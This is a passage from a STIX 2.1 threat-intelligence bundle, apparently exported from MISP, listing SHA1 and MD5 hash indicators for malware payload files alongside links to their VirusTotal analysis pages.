"value": "https://www.virustotal.com/file/21e406638bffc35ad1929c5b03a0bbd42d1a39fb481d1954e0c15135e01e3c6e/analysis/1422711554/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8250-4a5c-4d48-a72f-433c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:52.000Z",
|
|
"modified": "2017-03-29T09:45:52.000Z",
|
|
"description": "- Xchecked via VT: 66f3b47798a56b74517094038862ce1a4555e5c975427db3b00835377cc26725",
|
|
"pattern": "[file:hashes.SHA1 = 'e25dc99ca832b0cab1dcf22cf32a441d121a2f59']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:52Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8251-682c-4f67-ab34-43da02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:53.000Z",
|
|
"modified": "2017-03-29T09:45:53.000Z",
|
|
"description": "- Xchecked via VT: 66f3b47798a56b74517094038862ce1a4555e5c975427db3b00835377cc26725",
|
|
"pattern": "[file:hashes.MD5 = '1faa8deda32262861103d35650d8ea0b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:53Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8251-f478-4a9d-9663-44bb02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:53.000Z",
|
|
"modified": "2017-03-29T09:45:53.000Z",
|
|
"first_observed": "2017-03-29T09:45:53Z",
|
|
"last_observed": "2017-03-29T09:45:53Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8251-f478-4a9d-9663-44bb02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8251-f478-4a9d-9663-44bb02de0b81",
|
|
"value": "https://www.virustotal.com/file/66f3b47798a56b74517094038862ce1a4555e5c975427db3b00835377cc26725/analysis/1475975369/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8252-c64c-4173-845a-438402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:54.000Z",
|
|
"modified": "2017-03-29T09:45:54.000Z",
|
|
"description": "- Xchecked via VT: 0c760dc72a02073921d696840c31a372648a9f964be0afc0bd14554cb3a6be61",
|
|
"pattern": "[file:hashes.SHA1 = '125d0fbde8a3bc457230c49abe953594206f1c6e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:54Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8253-2b20-4de8-b4f8-43a302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:55.000Z",
|
|
"modified": "2017-03-29T09:45:55.000Z",
|
|
"description": "- Xchecked via VT: 0c760dc72a02073921d696840c31a372648a9f964be0afc0bd14554cb3a6be61",
|
|
"pattern": "[file:hashes.MD5 = '0a3d671acd3dd91f9d1eb4b29ce0068a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:55Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8254-fd5c-491e-bbdb-48d502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:56.000Z",
|
|
"modified": "2017-03-29T09:45:56.000Z",
|
|
"first_observed": "2017-03-29T09:45:56Z",
|
|
"last_observed": "2017-03-29T09:45:56Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8254-fd5c-491e-bbdb-48d502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8254-fd5c-491e-bbdb-48d502de0b81",
|
|
"value": "https://www.virustotal.com/file/0c760dc72a02073921d696840c31a372648a9f964be0afc0bd14554cb3a6be61/analysis/1435651536/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8255-5328-42dd-a81d-470e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:57.000Z",
|
|
"modified": "2017-03-29T09:45:57.000Z",
|
|
"description": "- Xchecked via VT: 98bbf1b17196a525e810689833dae910b144daf8ce85f31c73b9d0ca2dbdc426",
|
|
"pattern": "[file:hashes.SHA1 = 'f5498486ea5215d8db9cb0d484de7661b30b48a3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:57Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8256-9078-417c-82c6-4fdd02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:58.000Z",
|
|
"modified": "2017-03-29T09:45:58.000Z",
|
|
"description": "- Xchecked via VT: 98bbf1b17196a525e810689833dae910b144daf8ce85f31c73b9d0ca2dbdc426",
|
|
"pattern": "[file:hashes.MD5 = 'c38ace0a07d2e0971e318ec21a4884d3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:45:58Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8257-1428-4708-ad2e-46dc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:45:59.000Z",
|
|
"modified": "2017-03-29T09:45:59.000Z",
|
|
"first_observed": "2017-03-29T09:45:59Z",
|
|
"last_observed": "2017-03-29T09:45:59Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8257-1428-4708-ad2e-46dc02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8257-1428-4708-ad2e-46dc02de0b81",
|
|
"value": "https://www.virustotal.com/file/98bbf1b17196a525e810689833dae910b144daf8ce85f31c73b9d0ca2dbdc426/analysis/1435586886/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8258-cfac-4b6a-8c3f-40a202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:00.000Z",
|
|
"modified": "2017-03-29T09:46:00.000Z",
|
|
"description": "- Xchecked via VT: 770c79684d74bdf8fb6d0d7cf138ddd06fdf7506e91eab09d79ded677f04ab98",
|
|
"pattern": "[file:hashes.SHA1 = '57c5cad6e926ea6e3a190d1c567aff05680dc806']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:00Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8259-e5bc-4150-bced-4f4202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:01.000Z",
|
|
"modified": "2017-03-29T09:46:01.000Z",
|
|
"description": "- Xchecked via VT: 770c79684d74bdf8fb6d0d7cf138ddd06fdf7506e91eab09d79ded677f04ab98",
|
|
"pattern": "[file:hashes.MD5 = '5b223c0baf0c9e44c9c27e0c1cbf992b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db825a-8540-4a14-b9f1-4b2202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:02.000Z",
|
|
"modified": "2017-03-29T09:46:02.000Z",
|
|
"first_observed": "2017-03-29T09:46:02Z",
|
|
"last_observed": "2017-03-29T09:46:02Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db825a-8540-4a14-b9f1-4b2202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db825a-8540-4a14-b9f1-4b2202de0b81",
|
|
"value": "https://www.virustotal.com/file/770c79684d74bdf8fb6d0d7cf138ddd06fdf7506e91eab09d79ded677f04ab98/analysis/1435326600/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db825b-5b40-4a39-8bad-4b8902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:03.000Z",
|
|
"modified": "2017-03-29T09:46:03.000Z",
|
|
"description": "- Xchecked via VT: 2d9b959ad8e19d2dd1d60e1bcbcfb014fcd9d671316b310d864fb2d881c16462",
|
|
"pattern": "[file:hashes.SHA1 = '899aa0d720f357df3bba3afe04d11db4688a2273']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:03Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db825c-1b1c-40d8-825f-415a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:04.000Z",
|
|
"modified": "2017-03-29T09:46:04.000Z",
|
|
"description": "- Xchecked via VT: 2d9b959ad8e19d2dd1d60e1bcbcfb014fcd9d671316b310d864fb2d881c16462",
|
|
"pattern": "[file:hashes.MD5 = '457f97788ba63b3079911bd44c41657b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:04Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db825d-26f0-4889-86fd-473402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:05.000Z",
|
|
"modified": "2017-03-29T09:46:05.000Z",
|
|
"first_observed": "2017-03-29T09:46:05Z",
|
|
"last_observed": "2017-03-29T09:46:05Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db825d-26f0-4889-86fd-473402de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db825d-26f0-4889-86fd-473402de0b81",
|
|
"value": "https://www.virustotal.com/file/2d9b959ad8e19d2dd1d60e1bcbcfb014fcd9d671316b310d864fb2d881c16462/analysis/1435813741/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db825e-465c-46c7-aec4-44d202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:06.000Z",
|
|
"modified": "2017-03-29T09:46:06.000Z",
|
|
"description": "- Xchecked via VT: 5893e01e6ac20cfa75f184d1f6d708e3ccb3ff6da9f5183da415e3126e4d84b7",
|
|
"pattern": "[file:hashes.SHA1 = '90eee3e5e196a5e620fab247715313b1e976fa9d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:06Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db825f-66bc-4b59-98d2-4b2a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:07.000Z",
|
|
"modified": "2017-03-29T09:46:07.000Z",
|
|
"description": "- Xchecked via VT: 5893e01e6ac20cfa75f184d1f6d708e3ccb3ff6da9f5183da415e3126e4d84b7",
|
|
"pattern": "[file:hashes.MD5 = '9a071becd797dbfa74a34bdf48e72b78']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8260-54dc-4d61-b3c5-46ad02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:08.000Z",
|
|
"modified": "2017-03-29T09:46:08.000Z",
|
|
"first_observed": "2017-03-29T09:46:08Z",
|
|
"last_observed": "2017-03-29T09:46:08Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8260-54dc-4d61-b3c5-46ad02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8260-54dc-4d61-b3c5-46ad02de0b81",
|
|
"value": "https://www.virustotal.com/file/5893e01e6ac20cfa75f184d1f6d708e3ccb3ff6da9f5183da415e3126e4d84b7/analysis/1445065231/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8261-b8d0-4de2-8d90-487502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:09.000Z",
|
|
"modified": "2017-03-29T09:46:09.000Z",
|
|
"description": "- Xchecked via VT: e91c5056fc764bea87cc5a265a18c93140420ac15b030fa061f4e54e453d6c1e",
|
|
"pattern": "[file:hashes.SHA1 = '875912a8cdfbacbd28af8697fef2b2244fbde34e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8261-5d2c-491d-ae04-4f8d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:09.000Z",
|
|
"modified": "2017-03-29T09:46:09.000Z",
|
|
"description": "- Xchecked via VT: e91c5056fc764bea87cc5a265a18c93140420ac15b030fa061f4e54e453d6c1e",
|
|
"pattern": "[file:hashes.MD5 = '38914b9a0fa2324f92f2cdaa847516cd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8263-3888-4482-9949-46e402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:11.000Z",
|
|
"modified": "2017-03-29T09:46:11.000Z",
|
|
"first_observed": "2017-03-29T09:46:11Z",
|
|
"last_observed": "2017-03-29T09:46:11Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8263-3888-4482-9949-46e402de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8263-3888-4482-9949-46e402de0b81",
|
|
"value": "https://www.virustotal.com/file/e91c5056fc764bea87cc5a265a18c93140420ac15b030fa061f4e54e453d6c1e/analysis/1441452665/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8263-4034-4ef3-a7a2-48f202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:11.000Z",
|
|
"modified": "2017-03-29T09:46:11.000Z",
|
|
"description": "- Xchecked via VT: 30d40c80ead9fd48b39aeee9c6f9d38951470d16bbe2bac09107d66f197cf012",
|
|
"pattern": "[file:hashes.SHA1 = '094a8ed4853c40abd219db5d6d4668e85dbc2b29']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8264-1198-4a26-8142-46b202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:12.000Z",
|
|
"modified": "2017-03-29T09:46:12.000Z",
|
|
"description": "- Xchecked via VT: 30d40c80ead9fd48b39aeee9c6f9d38951470d16bbe2bac09107d66f197cf012",
|
|
"pattern": "[file:hashes.MD5 = '0bd9e484935daf53aac6077a60aad7ba']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8265-c5dc-48ec-afe1-491102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:13.000Z",
|
|
"modified": "2017-03-29T09:46:13.000Z",
|
|
"first_observed": "2017-03-29T09:46:13Z",
|
|
"last_observed": "2017-03-29T09:46:13Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8265-c5dc-48ec-afe1-491102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8265-c5dc-48ec-afe1-491102de0b81",
|
|
"value": "https://www.virustotal.com/file/30d40c80ead9fd48b39aeee9c6f9d38951470d16bbe2bac09107d66f197cf012/analysis/1441530293/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8266-7d30-42f9-a3af-4a9d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:14.000Z",
|
|
"modified": "2017-03-29T09:46:14.000Z",
|
|
"description": "- Xchecked via VT: 3a9ec7a665475ca2f8e4eb314a3b845a727b3a99a818263284604b76b1857960",
|
|
"pattern": "[file:hashes.SHA1 = '077489e745a197f3c1bb4e13cbb055fecb68818f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8267-4200-476e-8d02-4dde02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:15.000Z",
|
|
"modified": "2017-03-29T09:46:15.000Z",
|
|
"description": "- Xchecked via VT: 3a9ec7a665475ca2f8e4eb314a3b845a727b3a99a818263284604b76b1857960",
|
|
"pattern": "[file:hashes.MD5 = '832f6b00c66fce2e77d03b05dc952e54']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:15Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8268-34b8-4d45-91a1-415702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:16.000Z",
|
|
"modified": "2017-03-29T09:46:16.000Z",
|
|
"first_observed": "2017-03-29T09:46:16Z",
|
|
"last_observed": "2017-03-29T09:46:16Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8268-34b8-4d45-91a1-415702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8268-34b8-4d45-91a1-415702de0b81",
|
|
"value": "https://www.virustotal.com/file/3a9ec7a665475ca2f8e4eb314a3b845a727b3a99a818263284604b76b1857960/analysis/1441511356/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8269-18c4-4818-bd0e-433902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:17.000Z",
|
|
"modified": "2017-03-29T09:46:17.000Z",
|
|
"description": "- Xchecked via VT: 052e93c7733e1a1fc5094682ab3cc3324b838d5260a1bed899ff93ef0966608c",
|
|
"pattern": "[file:hashes.SHA1 = 'f99f7a29e2000a5025a09f85efddacb5ef83a05c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:17Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db826a-b200-44b2-8466-468902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:18.000Z",
|
|
"modified": "2017-03-29T09:46:18.000Z",
|
|
"description": "- Xchecked via VT: 052e93c7733e1a1fc5094682ab3cc3324b838d5260a1bed899ff93ef0966608c",
|
|
"pattern": "[file:hashes.MD5 = '9d575c1bfa8722029b249bcd0529e10f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:46:18Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db826b-2358-44f9-b008-41aa02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:46:19.000Z",
|
|
"modified": "2017-03-29T09:46:19.000Z",
|
|
"first_observed": "2017-03-29T09:46:19Z",
|
|
"last_observed": "2017-03-29T09:46:19Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db826b-2358-44f9-b008-41aa02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db826b-2358-44f9-b008-41aa02de0b81",
|
|
"value": "https://www.virustotal.com/file/052e93c7733e1a1fc5094682ab3cc3324b838d5260a1bed899ff93ef0966608c/analysis/1442298071/"
|
|
},
|
|
{
